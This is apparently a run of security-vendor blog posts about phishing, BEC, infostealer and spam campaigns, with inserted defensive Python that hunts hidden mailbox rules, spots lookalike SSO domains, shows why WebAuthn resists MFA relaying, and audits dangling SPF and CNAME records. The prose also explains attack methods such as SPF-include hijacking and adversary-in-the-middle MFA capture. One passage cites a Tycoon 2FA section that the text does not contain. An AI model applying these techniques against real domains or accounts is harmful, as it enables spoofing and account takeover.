One of the latest BEC campaigns to be identified impersonates U.S. government entities such as the Department of Transportation, the Department of Agriculture, and the Small Business Administration. Initial contact is made via email with a PDF attachment containing a QR code that links to information about a fake bidding process; the targeted individual is told to scan the QR code to find out more.

The PDF file explains that the QR code is included as complaints have been received that the bid button in the email does not work with some browsers and that the QR code will direct them to a document that should be downloaded as it is required to submit a bid. The emails and the PDF are crafted to appear to have been sent by the spoofed organization, and the website to which the user is directed resembles the official portal used by the spoofed government agency.

If the QR code is scanned, the user will be directed to a phishing site where they will be required to enter their Office 365 credentials, which will provide the attacker with access to their email account. Once access has been gained, the scammers can proceed to the next phase of the attack. They search the email account for messages related to banking or finance and use that information for their BEC attack and send messages to contacts that include fraudulent invoices or payment requests. The emails are sent from a trusted account, so the emails will likely be delivered and there is a good chance that the attack will be successful.

Security awareness training can help to raise awareness of the threat of these attacks with individuals involved in financial transactions in a company, and policies should be in place that require any requested change to banking information to be verified by phone using a previously verified phone number. It is also important to have an email security solution in place to block or flag potential BEC messages.

TitanHQ’s PhishTitan is an ideal choice. PhishTitan can identify and flag sophisticated phishing and BEC emails and can also decode and follow the URLs embedded in QR codes. When a suspicious email is detected, a banner is added to warn the user, and the email can be auto-remediated and moved to the junk folder. PhishTitan improves on Microsoft’s Office 365 spam filter. Independent tests by Virus Bulletin show the engine that powers TitanHQ’s SpamTitan spam filter for Office 365 and the PhishTitan O365 anti-phishing solution has a phishing catch rate of 99.914% with zero false positives. For every 80,000 emails received, PhishTitan identifies and blocks 20 unique, sophisticated phishing attempts that Microsoft’s top anti-phishing solution misses. The solution also costs a fraction of the average loss to a single BEC attack.

For more information about PhishTitan and how it can protect your business from advanced phishing and BEC attacks, give the TitanHQ team a call.

Facebook Messages Used to Distribute Snake Infostealer Malware

Malware is often distributed via email or websites linked in emails, and advanced email security solutions such as SpamTitan Plus can protect you by preventing the messages from reaching inboxes. SpamTitan Plus uses dual antivirus engines to detect known malware and sandboxing to identify and block zero-day malware threats. SpamTitan Plus also rewrites URLs, uses predictive analysis to identify suspicious URLs, and blocks those URLs to prevent users from reaching the websites where malware is hosted. To get around email security solutions, cybercriminals use other methods for making initial contact with end users, and instant messaging services are a popular alternative.

Researchers at Cybereason recently identified a malware distribution campaign that delivers a Python-based information stealer via Facebook messages. The infostealer, dubbed Snake, has been developed to steal credentials and other sensitive information. The campaign was first detected in the summer of 2023 and targets businesses. The messages use lures such as complaints and product offers from suppliers to trick users into visiting a link and downloading a file. As is common with malware distribution campaigns, the threat actor hosts the malicious file on legitimate public repositories such as GitHub and GitLab. The file is a compressed archive which, if extracted, leads to the execution of a first-stage downloader. That downloader fetches a second compressed file, extracts its contents, and executes a second downloader, which delivers the Python infostealer.

Three variants of the infostealer have been identified, all of which gain persistence via the Startup folder. Each variant targets web browsers, including Brave, Chromium, Chrome, Edge, Firefox, Opera, and the Vietnamese Cốc Cốc browser; the latter, along with other evidence, suggests the campaign is being conducted by a Vietnamese threat actor. All three variants also target Facebook cookies. The gathered data and cookies are exfiltrated in a .zip file via the Telegram Bot API or Discord.

One way of blocking these attacks is to use a web filter to block access to instant messaging services that are not required for business purposes, including Facebook Messenger. With WebTitan it is possible to block Messenger without blocking the Facebook site, and controls can be implemented for different users to allow users with responsibility for updating the organization’s social media sites to access the platforms while preventing access for other users. It is also a good practice to use WebTitan to block downloads of executable files from the Internet to prevent malware delivery and stop employees from downloading and installing unauthorized software.

Dropbox Abused in Novel Phishing Attack to Obtain M365 Credentials

The file hosting service Dropbox is being abused in a novel phishing campaign that exploits trust in the platform to harvest Microsoft 365 credentials. The campaign targeted 16 employees of an organization who received an email from the no-reply[@]dropbox.com account, a legitimate email account that is used by Dropbox. The emails included a link that directed the recipients to a Dropbox-hosted PDF file, which was named to appear as if it had been created by one of the organization’s partners. If the PDF file was opened, the user would see a link that directs them to an unrelated domain – mmv-security[.]top. One of the employees was then sent a follow-up email reminding them to open the PDF file that was sent in the first email. They did, and they were directed to a phishing page that spoofed the Microsoft 365 login page. A couple of days later, suspicious logins were detected in the user’s Microsoft 365 account from unknown IP addresses, which were investigated and found to be associated with ExpressVPN, indicating the attacker was using the VPN to access the account and mask their IP address.

Multi-factor authentication was correctly configured on the account but appears to have been bypassed, with the logins presenting a valid MFA token. After their credentials were captured, the employee is thought to have unknowingly approved the MFA request triggered by the attacker’s login, which allowed the account to be compromised. The attacker then created a mailbox rule that moved emails from the organization’s accounts team to the Conversation History folder to hide the malicious use of the mailbox, and sent emails from the account to the accounts team in an apparent attempt to compromise their accounts too.
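Mailbox rules like the one used here are a reliable post-compromise signal and worth hunting for across a tenant. The following Python is an added example, not part of the original report: it scores rules shaped like the Microsoft Graph messageRule resource for hiding actions (moves to folders users never look in, delete, mark as read) combined with a targeting clue (finance-related conditions or a throwaway name such as "."), and for any forward to an external address. The sample rules and the internal domain are constructed, and moveToFolder is assumed to already hold the folder’s display name rather than the folder id Graph returns.

```python
"""Hunt for mailbox rules that hide or divert mail after an account takeover.

Added example, not part of the original write-up. Rules follow the shape of the
Microsoft Graph messageRule resource (conditions/actions), but the sample rules
are constructed, INTERNAL_DOMAIN is made up, and moveToFolder is assumed to hold
the folder's display name (Graph returns a folder id that you resolve first).
"""

INTERNAL_DOMAIN = "example.com"
# Folders users rarely look in: a classic place to park mail the attacker wants unseen
HIDING_FOLDERS = {"conversation history", "rss feeds", "rss subscriptions", "archive",
                  "junk email", "deleted items", "notes"}
FINANCE_TERMS = ("invoice", "payment", "bank", "wire", "remit", "accounts", "iban", "swift")


def _addresses(entries):
    return [e["emailAddress"]["address"].lower() for e in (entries or [])]


def assess_rule(rule: dict) -> dict:
    cond = rule.get("conditions") or {}
    acts = rule.get("actions") or {}
    name = (rule.get("displayName") or "").strip()

    throwaway_name = not any(ch.isalnum() for ch in name)     # ".", "..", "" are common
    haystack = " ".join(
        (cond.get("senderContains") or []) + (cond.get("subjectContains") or [])
        + (cond.get("bodyContains") or []) + _addresses(cond.get("fromAddresses"))
    ).lower()
    finance_match = any(term in haystack for term in FINANCE_TERMS)

    hides = []
    dest = (acts.get("moveToFolder") or "").lower()
    if dest in HIDING_FOLDERS:
        hides.append(f"moves mail to '{dest}'")
    if acts.get("delete"):
        hides.append("deletes mail")
    if acts.get("markAsRead"):
        hides.append("marks mail as read")

    external = [a for a in _addresses((acts.get("forwardTo") or []) + (acts.get("redirectTo") or [])
                                      + (acts.get("forwardAsAttachmentTo") or []))
                if not a.endswith("@" + INTERNAL_DOMAIN)]

    reasons = []
    if throwaway_name:
        reasons.append(f"throwaway rule name {name!r}")
    if finance_match:
        reasons.append("condition targets finance/accounts mail")
    reasons += hides
    reasons += [f"forwards to external address {a}" for a in external]

    # Marking mail read on its own is common; hiding plus a targeting clue, or any
    # external forward, is the shape the Dropbox case took.
    flagged = bool(external) or (bool(hides) and (throwaway_name or finance_match))
    return {"name": name, "flagged": flagged, "reasons": reasons}


def hunt(rules) -> list:
    """Assess every enabled rule; disabled rules are skipped but worth a glance too."""
    return [assess_rule(r) for r in rules if r.get("isEnabled", True)]


# Constructed sample rules
SAMPLE_RULES = [
    {"displayName": "Newsletters", "isEnabled": True,
     "conditions": {"senderContains": ["newsletter"]},
     "actions": {"moveToFolder": "Newsletters", "markAsRead": True}},
    {"displayName": ".", "isEnabled": True,
     "conditions": {"fromAddresses": [{"emailAddress": {"address": "accounts@example.com"}}]},
     "actions": {"moveToFolder": "Conversation History", "markAsRead": True,
                 "stopProcessingRules": True}},
    {"displayName": "Backup", "isEnabled": True,
     "conditions": {"subjectContains": ["invoice", "payment"]},
     "actions": {"forwardTo": [{"emailAddress": {"address": "ar.backup@webmail.example"}}]}},
]

if __name__ == "__main__":
    for result in hunt(SAMPLE_RULES):
        print(result)
```

The first rule is ordinary housekeeping and is not flagged, the second is the Conversation History pattern from this incident, and the third is the forwarding variant that also needs the tenant-level outbound forwarding policy reviewed.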

Phishing attacks are becoming increasingly sophisticated and much harder for end users to identify. Security awareness training programs often teach users the red flags to look for: unsolicited emails from unknown senders, links to unusual domains, and requests that carry urgency and a threat should no action be taken. Impersonation is common in phishing attacks, but in this case it went further, with the emails sent from a valid and trusted account. That makes the email more likely to be trusted and less likely to be blocked by email security solutions, especially as it links to a file hosted on a trusted platform. This was also a staged attack with a follow-up email, which proved effective even though the second email was delivered to the junk folder. The login page to which the user was directed looked exactly like the genuine Microsoft 365 login prompt, apart from the domain on which it was hosted.

Many businesses have configured multifactor authentication on their Microsoft 365 accounts, but as this attack demonstrates, MFA can be bypassed. The sophisticated nature of phishing attacks such as this demonstrates how important it is for businesses to have advanced defenses against phishing. TitanHQ’s anti-phishing solutions use AI and a large language model (LLM) with proprietary threat intelligence currently not found in any other anti-phishing and anti-spam software solutions on the market. All emails are scanned – internal and external – for phrases and keywords that are unusual and could indicate malicious intent. All URLs are checked against various threat intelligence feeds to identify malicious URLs, and URLs are rewritten to show their true destination. The solution also learns from feedback provided by users and detection improves further over time. The curated and unique email threat intelligence data is unmatched in visibility, coverage, and accuracy, and TitanHQ’s anti-spam and email security solutions feature sandboxing, where attachments are subjected to deep analysis in addition to signature-based anti-virus scanning. When a malicious email is detected, all other instances are removed from the entire M365 tenant.

If you want to improve your defenses against sophisticated phishing attacks give the TitanHQ team a call. If you are a Managed Service Provider looking for an easy-to-use solution to protect your clients from phishing and malware, look no further than TitanHQ. All solutions have been developed from the ground up to meet the needs of MSPs to better protect their customers from spam, phishing, malware, and BEC attacks.

CryptoChameleon Phishing Kit Targets FCC Employees and Cryptocurrency Platform Users

A new phishing kit has been identified that is being used to target employees of the U.S. Federal Communications Commission (FCC) and of the cryptocurrency platforms Binance and Coinbase, as well as users of cryptocurrency platforms including Binance, Coinbase, Caleb & Brown, Gemini, Kraken, ShakePay, and Trezor.

A phishing kit is a set of tools and templates that allows threat actors to conduct effective phishing campaigns. These kits are marketed on the dark web to hackers and allow them to conduct phishing campaigns without having to invest time and money into setting up their own infrastructure. Phishing kits range from simple kits that provide phishing templates and cloned login pages, to more advanced kits that are capable of adversary-in-the-middle attacks that can defeat multifactor authentication. These kits significantly lower the entry barrier for conducting phishing campaigns as they require little technical expertise. Pay a relatively small fee and sophisticated phishing campaigns can be conducted in a matter of minutes.

The new phishing kit, called CryptoChameleon, lets users create carbon copies of the single sign-on (SSO) pages used by the targeted businesses. Employees are accustomed to authenticating through one SSO portal that fronts many business applications, so a convincing replica of that page harvests credentials that unlock all of them. The kit also includes templates for phishing pages that impersonate Okta, iCloud, Gmail, Outlook, Yahoo, AOL, and Twitter, used to harvest the credentials of cryptocurrency platform users and employees.

The phishing operation was discovered by researchers at Lookout and more than 100 high-value victims of this campaign have been identified to date. Threat actors using the kit have been contacting users via SMS, email, and phone calls to trick them into visiting a malicious site where their credentials are harvested. Users are redirected to a phishing site but before the content is displayed, they are required to pass an hCAPTCHA check. This helps with the credibility of the campaign, but most importantly it prevents automated analysis tools and security solutions from identifying the phishing site.

In the campaign targeting FCC employees, after passing the hCAPTCHA check the user is presented with a login page that is a carbon copy of the FCC’s Okta page. The domain on which the page is hosted, fcc-okta[.]com, differs from the legitimate FCC Okta login domain by a single character (a hyphen in place of a dot). Login credentials alone are not normally enough, as many accounts are protected by MFA, so the captured credentials are used to log in to the real account in real time, and the victim is then shown a page that collects whatever is needed to pass the MFA check, whether an SMS-delivered code or the code from their authenticator app. Once the MFA check has been passed and the threat actor is in the account, the victim can be redirected anywhere; for instance, they may be told the login was unsuccessful and to try again later.
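The one-character difference is easy to miss by eye but trivial to check in code, for instance in a browser extension, a proxy, or a URL-rewriting mail filter that knows which SSO hosts the organization actually uses. The following Python is an added example, not Lookout’s tooling: it compares a login-page host against an allowlist of genuine SSO hosts using a hyphen/dot swap check, a subdomain-prefix check, a small edit distance, and a brand token appearing under someone else’s registrable domain. The allowlist is constructed, and fcc.okta.com is assumed to be the genuine tenant host that fcc-okta[.]com imitates.

```python
"""Check the host of a login page against the SSO hosts the organisation really uses.

Added example, not Lookout's tooling. The allowlist is constructed; fcc.okta.com
is assumed to be the genuine tenant host that fcc-okta[.]com imitates.
"""
SSO_HOSTS = {"fcc.okta.com", "login.microsoftonline.com"}
BRAND_TOKENS = {"okta", "microsoftonline"}


def registrable(host: str) -> str:
    """Last two labels; use a public-suffix list for multi-label TLDs such as co.uk."""
    return ".".join(host.split(".")[-2:])


def osa_distance(a: str, b: str) -> int:
    """Optimal string alignment distance: insert, delete, substitute, adjacent swap."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[len(a)][len(b)]


def assess_host(host: str) -> tuple:
    """Return ('allowed' | 'lookalike' | 'unknown', reasons)."""
    host = host.lower().strip().rstrip(".")
    if host in SSO_HOSTS:
        return "allowed", []
    reasons = []
    for good in SSO_HOSTS:
        if host.startswith(good + "."):
            reasons.append(f"uses {good} as a subdomain prefix")
        elif host.replace("-", ".") == good:
            reasons.append(f"hyphen/dot swap of {good}")
        elif osa_distance(host, good) <= 2:
            reasons.append(f"within 2 edits of {good}")
    # the brand's name appearing under a registrable domain the brand does not own
    legit_apexes = {registrable(g) for g in SSO_HOSTS}
    if registrable(host) not in legit_apexes:
        for token in BRAND_TOKENS:
            if token in host:
                reasons.append(f"brand token '{token}' outside its own domain")
    return ("lookalike" if reasons else "unknown"), reasons


if __name__ == "__main__":
    for h in ("fcc.okta.com", "fcc-okta.com", "fcc.okta.com.evil.example", "intranet.example"):
        print(h, assess_host(h))
```

An "unknown" host is not necessarily malicious, but a credential form on one should at least be logged; a "lookalike" verdict on a page asking for SSO credentials is a block.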

To target cryptocurrency platform users, messages are sent about security alerts, such as warnings that the account has been accessed. These messages are likely to attract a rapid response given the risk of substantial financial losses. In the campaign targeting Coinbase, the user is told they can secure their account by logging in and terminating suspicious devices. The credentials and MFA codes needed to access the account are then obtained using the same process as in the FCC campaign.

This is just one of many phishing kits offered on the dark web. Protecting against these phishing kits requires a combination of measures including an advanced spam filter, web filter, and security awareness training. For further information on cybersecurity solutions capable of combatting advanced phishing attempts, give the TitanHQ team a call.

Phishing-as-a-Service Poses a Serious Threat to Businesses

Cybercriminals are increasingly offering services that make it easy for anyone to conduct an attack. Skilled malware developers can concentrate on writing their malware and making it available for others to use for a fee; ransomware-as-a-service allows hackers who are skilled at breaching networks to conduct lucrative ransomware attacks without having to develop encryptors or pay for the infrastructure to support their attacks; and phishing-as-a-service provides a platform for conducting attacks to steal credentials and access accounts. These services benefit all parties involved and allow even more attacks to be conducted.

Phishing campaigns may appear simple, but they require a lot of time and skill to set up. Stephanie Carruthers, who leads an IBM X-Force phishing research project, said it takes her team about 16 hours to craft a phishing email, not including the time it takes to set up all the necessary infrastructure to send the email and steal credentials. Setting up the infrastructure is time-consuming and costly, and many businesses now have multi-factor authentication (MFA) to thwart attacks.

With phishing-as-a-service (PhaaS), anyone who wants to run a phishing campaign can simply pay a subscription and will be provided with all the tools they need to conduct attacks. They do not need to craft the phishing emails, they just need to set a few parameters and provide the email addresses for the campaign. PhaaS makes conducting sophisticated attacks simple and significantly lowers the bar for conducting campaigns.

Take LabHost, for example, a PhaaS platform that recently added functionality for targeting banks and financial institutions in Canada and the United States. Since this functionality was added in the first half of 2023, attacks have increased considerably. Customers pay a monthly subscription for a turnkey phishing kit that includes the infrastructure for hosting phishing pages, a content generator for creating phishing emails, and a portal for monitoring campaigns: $179 per month to target Canadian banks, $249 per month to add North American targets, and $300 a month to also target 70 financial institutions worldwide. Customers are also provided with phishing pages for collecting credentials for a variety of other companies, including music streaming sites, delivery services, and telecommunications companies.

Important to the success of any campaign is the ability to defeat multi-factor authentication. The LabHost phishing kit incorporates LabRat, a phishing tool that allows real-time management of phishing campaigns and allows adversary-in-the-middle attacks where two-factor authentication codes and cookies are obtained in addition to usernames and passwords. That means the additional security processes on the online portals of banks can be circumvented. The platform also allows SMS-based attacks to be conducted.

PhaaS allows unskilled hackers to conduct effective campaigns that they otherwise would not be able to conduct. Further, with the use of AI to craft convincing phishing emails, phishing emails are becoming much harder for humans and security solutions to detect, and even MFA and other security measures can be bypassed.

Defending against attacks is therefore challenging, and there is no single cybersecurity solution that will block all attacks. What is needed is a defense-in-depth approach, with multiple, overlapping layers of protection. Cybersecurity solutions are required to block the phishing emails. SpamTitan is an advanced email security solution with AI and machine learning capabilities for identifying novel phishing threats. SpamTitan blocks known malware through AV controls and unknown malware through sandboxing. The message sandboxing feature uses pattern filtering to identify malware from its behavior, which allows zero-day malware threats to be identified and blocked. Malware sandboxing is vital for email security since so many novel malware threats are now being released. SpamTitan is also capable of identifying even machine-crafted phishing content.

Phishing Statistics Infographic

End user training is also vital, as no email security solution will block all email threats without also blocking an unacceptable number of genuine emails. End users should be trained on how to identify, avoid, and report phishing emails. The SafeTitan security awareness training platform makes security awareness training simple, and the constantly updated content allows businesses to respond to changing phishing tactics and conduct phishing simulations on the workforce to reinforce training and identify knowledge gaps.

Given the number of phishing kits that are capable of bypassing multi-factor authentication, simply enabling MFA on accounts is no longer sufficient to protect against unauthorized access. Phishing-resistant multi-factor authentication is required, such as FIDO2/WebAuthn authentication or public key infrastructure (PKI)-based MFA, to block the adversary-in-the-middle attacks that can be conducted through PhaaS.
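This is the difference between the OTP-based MFA that Tycoon 2FA and LabRat relay (the Tycoon 2FA section above) and the FIDO2/WebAuthn MFA recommended here, shown in an added Python example that is not code from any kit or vendor discussed on this page. A TOTP code is a function of the secret and the clock only, so a code typed into the proxy’s page is valid on the real site. A WebAuthn assertion is bound to the origin the browser saw and to the rpId the credential was created for, so a proxy on its lookalike domain cannot obtain one the relying party will accept. The relying party example.com, its login origin, the lookalike origin and the credentials are all constructed, and an HMAC stands in for the authenticator’s signature to keep the example standard-library only; the origin and rpId checks are the real ones.

```python
"""Why an AiTM proxy can relay a TOTP code but not a WebAuthn assertion.

Added example, not code from any of the phishing kits or vendors discussed.
All names are constructed: the relying party example.com, its login origin, and
the proxy's lookalike origin. HMAC stands in for the authenticator's ECDSA
signature so the example stays standard-library only; the origin and rpId
checks are the real WebAuthn ones.
"""
import hashlib
import hmac
import json
import struct

RP_ID = "example.com"
RP_ORIGIN = "https://login.example.com"
PHISH_ORIGIN = "https://login-example.com"   # AiTM reverse proxy in front of RP_ORIGIN


def totp(secret: bytes, at: int, step: int = 30, digits: int = 6) -> str:
    """RFC 6238 TOTP (HMAC-SHA1). The code depends only on (secret, time), never on
    which web page asked for it, which is exactly why a proxy can relay it."""
    mac = hmac.new(secret, struct.pack(">Q", at // step), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = (struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF) % 10 ** digits
    return str(code).zfill(digits)


class Authenticator:
    """Holds one credential per rpId and signs authenticatorData || clientDataHash."""

    def __init__(self):
        self.creds = {}
        self.counter = 0

    def register(self, rp_id: str) -> bytes:
        self.creds[rp_id] = hashlib.sha256(b"cred|" + rp_id.encode()).digest()
        return self.creds[rp_id]          # the RP stores this (a public key in reality)

    def get_assertion(self, rp_id: str, client_data_hash: bytes):
        key = self.creds[rp_id]           # KeyError: no credential scoped to this rpId
        self.counter += 1
        auth_data = hashlib.sha256(rp_id.encode()).digest() + b"\x01" + struct.pack(">I", self.counter)
        return auth_data, hmac.new(key, auth_data + client_data_hash, hashlib.sha256).digest()


def browser_get(auth: Authenticator, page_origin: str, rp_id: str, challenge: str):
    """What the browser enforces: rpId must be a registrable suffix of the page's host,
    and the browser (not the page) writes the page origin into clientDataJSON."""
    host = page_origin.split("://", 1)[1]
    if host != rp_id and not host.endswith("." + rp_id):
        raise PermissionError(f"rpId {rp_id!r} is not valid for origin {page_origin}")
    client_data = json.dumps({"type": "webauthn.get", "challenge": challenge,
                              "origin": page_origin}, sort_keys=True).encode()
    auth_data, sig = auth.get_assertion(rp_id, hashlib.sha256(client_data).digest())
    return client_data, auth_data, sig


def rp_verify(key: bytes, challenge: str, client_data: bytes, auth_data: bytes, sig: bytes) -> str:
    """Relying-party checks from the WebAuthn spec, in order; returns 'ok' or the failure."""
    cd = json.loads(client_data)
    if cd.get("type") != "webauthn.get" or cd.get("challenge") != challenge:
        return "bad challenge"
    if cd.get("origin") != RP_ORIGIN:
        return f"origin mismatch: {cd.get('origin')}"
    if auth_data[:32] != hashlib.sha256(RP_ID.encode()).digest():
        return "rpIdHash mismatch"
    expected = hmac.new(key, auth_data + hashlib.sha256(client_data).digest(), hashlib.sha256).digest()
    return "ok" if hmac.compare_digest(expected, sig) else "bad signature"


def genuine_login(auth: Authenticator, key: bytes, challenge: str) -> str:
    return rp_verify(key, challenge, *browser_get(auth, RP_ORIGIN, RP_ID, challenge))


def relay_totp(secret: bytes, now: int) -> bool:
    """Victim types the code into the phishing page; the proxy submits it to the real
    site within the same time step. The RP's own check passes."""
    typed_on_phishing_page = totp(secret, now)
    return typed_on_phishing_page == totp(secret, now)


def relay_webauthn(auth: Authenticator, key: bytes, challenge: str) -> str:
    """The proxy fetches a real challenge from the RP and tries to get the victim's
    browser, which is on PHISH_ORIGIN, to sign it."""
    outcome = []
    try:  # 1. ask for the RP's rpId from the lookalike page: the browser refuses
        browser_get(auth, PHISH_ORIGIN, RP_ID, challenge)
    except PermissionError as e:
        outcome.append(str(e))
    try:  # 2. ask for the lookalike host's own rpId: no credential exists for it
        browser_get(auth, PHISH_ORIGIN, "login-example.com", challenge)
    except KeyError as e:
        outcome.append(f"no credential for rpId {e.args[0]!r}")
    # 3. even if an assertion were somehow produced on the phishing origin, the RP
    #    rejects it because clientDataJSON carries that origin
    client_data = json.dumps({"type": "webauthn.get", "challenge": challenge,
                              "origin": PHISH_ORIGIN}, sort_keys=True).encode()
    auth_data, sig = auth.get_assertion(RP_ID, hashlib.sha256(client_data).digest())
    outcome.append("RP says: " + rp_verify(key, challenge, client_data, auth_data, sig))
    return "; ".join(outcome)


if __name__ == "__main__":
    seed = b"12345678901234567890"        # RFC 6238 test secret
    print("TOTP relayed:", relay_totp(seed, 59))
    a = Authenticator()
    k = a.register(RP_ID)
    print("genuine WebAuthn login:", genuine_login(a, k, "c1"))
    print("relayed WebAuthn login:", relay_webauthn(a, k, "c2"))
```

The TOTP value for the RFC 6238 test secret at t=59 is the published vector (287082 when truncated to six digits), and it relays cleanly; the WebAuthn attempt fails at all three points where the protocol binds the ceremony to the origin. Push-approval MFA sits on the TOTP side of this line: the proxy's relayed login is what triggers the push the victim approves.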

If you want to improve your defenses against phishing and other cybercriminal services, give the TitanHQ team a call to discuss your options.

Massive Spamming Campaign Uses Thousands of Hijacked Subdomains

A massive email spamming campaign has been detected that is generating up to 5 million emails per day that direct recipients of the emails to a variety of scam sites. The emails are sent through hijacked subdomains and domains of trusted companies, which help these emails evade email security solutions and be delivered to inboxes. Companies that have had domains and subdomains hijacked include eBay, CBS, McAfee, MSN, and Symantec.

Email security solutions perform a range of checks on inbound emails, including sender authentication (SPF, DKIM, and DMARC) and reputation checks on the sending domain. If a trusted domain has not previously been associated with spam and its authentication records vouch for the sending server, these checks are passed and the emails are delivered to end users. The use of legitimate domains also makes it harder for end users to tell whether messages are genuine. Security awareness training often teaches end users to check that the sender’s domain matches the company being spoofed; if the domain is eBay’s and the email uses eBay branding, end users are likely to assume the communication is genuine. These emails include links to websites that generate fraudulent ad revenue, and often several redirects occur before the user lands on the destination scam or phishing site.

The ‘SubdoMailing’ campaign was identified by researchers at Guardio Labs, with the legitimate domains typically hijacked through SPF record exploitation or CNAME hijacking. The former involves searching for SPF records whose ‘include:’ mechanism points to an external domain that is no longer registered. The threat actor registers that domain and publishes an SPF record on it authorizing their own mail servers; because the brand’s record still includes it, the brand’s SPF policy now authorizes the attacker’s servers too, and mail they send appears to come from the targeted brand, such as eBay.

With CNAME hijacking, scans are conducted to identify subdomains of reputable brands with CNAME records that point to external domains that are no longer registered. The threat actor registers those domains, adds SPF records, and can then send email from their own servers that appears to come from the legitimate company. By hijacking huge numbers of domains and subdomains, the threat actor can conduct massive spamming campaigns. The researchers identified more than 13,000 subdomains and more than 8,000 domains used in the campaign, with more than 1,000 residential lines and almost 22,000 unique IP addresses. The researchers developed a tool to allow domain owners to check whether their own domains have been hijacked and stop the abuse. Because mail from the hijacked domains passes SPF (and therefore DMARC alignment), blocking it requires a spam filter that does not rely solely on SPF, DKIM, and DMARC results to identify spam.
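Domain owners can find these lapsed references themselves before someone else does. The following Python is an added example, not Guardio’s checker: it walks a domain’s SPF include/redirect tree, counts the DNS-costing mechanisms against the 10-lookup limit of RFC 7208, reports any include whose registrable domain no longer exists, and then follows CNAME chains for the same condition. DNS answers come from a constructed in-memory zone under .example rather than live lookups, and is_registered() approximates the registration check by asking whether the zone table knows the apex at all; real code would query RDAP or WHOIS and use a public-suffix list.

```python
"""Audit a domain's SPF include chain and CNAME records for lapsed (takeover-able)
targets, the two hijack routes used by SubdoMailing.

Added example, not Guardio's tool. DNS comes from a constructed in-memory zone
table (all names under .example) instead of live lookups; is_registered()
approximates "is the registrable domain still registered" by checking whether
the table knows any name under it, where real code would query RDAP/WHOIS.
"""
import re

ZONE = {
    "brand.example": {"TXT": ["v=spf1 include:_spf.brand.example include:mail.lapsed-vendor.example -all"]},
    "_spf.brand.example": {"TXT": ["v=spf1 ip4:192.0.2.0/24 include:relay.mailhost.example ~all"]},
    "relay.mailhost.example": {"TXT": ["v=spf1 ip4:198.51.100.0/24 -all"]},
    "promo.brand.example": {"CNAME": "brand-campaign.forgotten-saas.example"},
    "shop.brand.example": {"CNAME": "brand.active-saas.example"},
    "brand.active-saas.example": {"A": ["203.0.113.5"]},
}

# SPF mechanisms/modifiers that cost a DNS lookup (RFC 7208 caps these at 10)
LOOKUP_TERM = re.compile(r"^[+\-~?]?(include|a|mx|ptr|exists|redirect)(?:[:=](.+))?$", re.I)


def registrable(name: str) -> str:
    """Last two labels; good enough for .example names, use a public-suffix list for real TLDs."""
    return ".".join(name.lower().rstrip(".").split(".")[-2:])


def is_registered(name: str) -> bool:
    apex = registrable(name)
    return any(registrable(n) == apex for n in ZONE)


def txt(name: str) -> list:
    return ZONE.get(name, {}).get("TXT", [])


def cname(name: str):
    return ZONE.get(name, {}).get("CNAME")


def _walk(domain, findings, seen, lookups):
    if domain in seen:
        findings.append(("spf-loop", domain, None))
        return
    seen.add(domain)
    spf = [t for t in txt(domain) if t.lower().startswith("v=spf1")]
    if len(spf) != 1:
        findings.append(("spf-missing" if not spf else "spf-multiple", domain, None))
        return
    for term in spf[0].split()[1:]:
        m = LOOKUP_TERM.match(term)
        if not m:
            continue                       # ip4/ip6/all cost no lookup
        lookups[0] += 1
        mech, target = m.group(1).lower(), (m.group(2) or domain)
        if mech in ("include", "redirect"):
            if not is_registered(target):
                # whoever registers `target` can publish an SPF record there and is
                # then authorised to send as `domain`
                findings.append(("dangling-include", domain, target))
            else:
                _walk(target, findings, seen, lookups)


def audit_spf(domain: str):
    """Return (findings, lookup_count) for the full include/redirect tree."""
    findings, seen, lookups = [], set(), [0]
    _walk(domain, findings, seen, lookups)
    if lookups[0] > 10:
        findings.append(("spf-too-many-lookups", domain, str(lookups[0])))
    return findings, lookups[0]


def audit_cname(name: str, max_hops: int = 8):
    """Follow the CNAME chain; report the first hop whose registrable domain has lapsed."""
    current, hops = name, 0
    while hops < max_hops:
        target = cname(current)
        if target is None:
            return None
        if not is_registered(target):
            return ("dangling-cname", name, target)
        current, hops = target, hops + 1
    return ("cname-chain-too-long", name, current)


if __name__ == "__main__":
    print(audit_spf("brand.example"))
    for sub in ("promo.brand.example", "shop.brand.example"):
        print(sub, audit_cname(sub))
```

Run against a real zone, the two findings to act on immediately are dangling-include (remove the mechanism, or re-register the domain yourself) and dangling-cname (delete the record); an SPF tree over the lookup limit is a separate problem, since receivers treat it as a permanent error and your own mail starts failing.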

Travel Companies Impersonated in Malware Distribution Campaign

Cybercriminals are constantly devising new email campaigns for distributing malware. These campaigns usually impersonate a trusted entity and advise the email recipient about a pressing issue that requires immediate attention. The emails often have an attached file that must be opened to find out further information about the issue detailed in the email.

One recently detected campaign impersonates travel service providers such as booking.com and advises the recipient about a problem with a recent booking. One of the intercepted emails explains that an error has occurred with a booking that has resulted in a double charge to the user’s credit card which requires immediate attention. The email has a PDF attachment which needs to be opened for further information. PDF files are increasingly being used in email campaigns for distributing malware. The PDF files often contain a script that generates an error message when the file is opened that tells the user that the content of the file cannot be displayed, and they are provided with an option to download the file.

In this campaign, the PDF file contains a script that generates a fake popup message. If clicked, a connection is made to a malicious URL and a download of an obfuscated JavaScript file is initiated. The script downloads the next stage PowerShell payload, and on execution, drops a malicious DLL file on the device. The DLL file searches for certain critical system processes and attempts to forcibly stop them, makes changes to the registry that affect the Windows Antimalware Scan Interface (AMSI) and ensures that the malware is executed without being detected by security solutions. An analysis of the DLL file by researchers at Forcepoint shows the file is from the Agent Tesla malware family. Agent Tesla is a remote access trojan (RAT) that first appeared in 2014 and grew in popularity during the COVID-19 pandemic. Agent Tesla is provided under the malware-as-a-service model and is popular with initial access brokers, who specialize in gaining access to devices and accounts and then sell that access to other cybercriminals such as ransomware gangs.

